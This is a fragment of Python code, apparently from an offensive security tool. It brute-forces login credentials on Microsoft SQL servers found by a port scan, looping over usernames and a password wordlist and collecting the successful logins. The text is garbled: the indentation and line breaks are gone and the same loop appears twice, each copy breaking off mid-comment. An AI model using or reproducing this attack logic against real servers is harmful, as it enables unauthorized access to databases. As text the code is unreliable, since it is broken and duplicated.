usernames = open(username, "r") if sql_servers != False: # get rid of extra data from port scanner sql_servers = sql_servers.replace(":%s OPEN" % (port), "") # split into tuple for different IP address sql_servers = sql_servers.split(",") # start loop and brute force for servers in sql_servers: # this will return the following format ipaddr + "," + # username + "," + str(port) + "," + passwords if servers != "": # if we aren't using a username file if not os.path.isfile(username): sql_success = mssql.brute( servers, username, port, wordlist) if sql_success != False: # after each success or fail it will break # into this to the above with a newline to # be parsed later master_list = master_list + \ sql_success + ":" counter = 1 # if we specified a username list if os.path.isfile(username): for users in usernames: users = users.rstrip() sql_success = mssql.brute( servers, users, port, wordlist) # we wont break out of the loop here incase
print_status("The following SQL servers and associated ports were identified:\n") for sql in sql_servers: if sql != "": print(sql) if len(sql_servers) > 2: print_status("By pressing enter, you will begin the brute force process on all SQL accounts identified in the list above.") test = input("Press {enter} to begin the brute force process.") for servers in sql_servers: # this will return the following format ipaddr + "," + # username + "," + str(port) + "," + passwords if servers != "": # if we aren't using a username file if not os.path.isfile(username): sql_success = mssql.brute( servers, username, port, wordlist) if sql_success != False: # after each success or fail it will break # into this to the above with a newline to # be parsed later master_list = master_list + \ sql_success + ":" counter = 1 # if we specified a username list if os.path.isfile(username): for users in usernames: users = users.rstrip() sql_success = mssql.brute( servers, users, port, wordlist) # we wont break out of the loop here incase